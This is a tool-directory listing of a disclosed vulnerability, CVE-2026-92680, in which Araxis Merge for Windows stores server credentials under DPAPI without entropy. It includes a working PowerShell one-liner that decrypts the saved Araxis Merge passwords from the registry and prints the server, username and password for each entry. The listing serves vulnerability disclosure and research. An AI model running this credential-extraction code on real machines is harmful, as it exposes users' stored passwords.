Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/grepstrength/cve-2026-92680
Password CrackingVulnerability AnalysisExploitationCryptography
GitHubgrepstrength/cve-2026-92680

CVE-2026-92680

Proof-of-concept decrypting Araxis Merge's DPAPI-protected server credentials (CVE-2026-92680), demonstrating insufficiently protected credential storage on Windows.

View Repository
118h 36m agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-92680

Araxis Merge for Windows stores server credentials with DPAPI with pOptionalEntropy set to NULL. This allows any code running in the same user context to decrypt them.

Full writeup: https://grepstrength.com/research/araxis-merge

CVECVE-2026-92680
CWECWE-522: Insufficiently Protected Credentials
CVSS v3.15.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
VendorAraxis Ltd.
AffectedAraxis Merge for Windows 2011.4074 through 2026.0
Fixed in2026.1
Vendor advisoryMerge-SA-26-00
Reported2026-08-18
Disclosed2026-XX-XX
ReportergrepStrength

Proof-of-Concept

This will decrypt and parse HKCU\Software\Araxis\Merge\7.1\Passwords. This must be run as the same Windows user that originally stored the credentials.

root@kitploit:~
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize

Notes

All testing was performed on systems owned by grepStength Security using only synthetic credentials. This was reported to Araxis Ltd. and publcly disclosed after a fix was made available.

License

MIT

Download Tool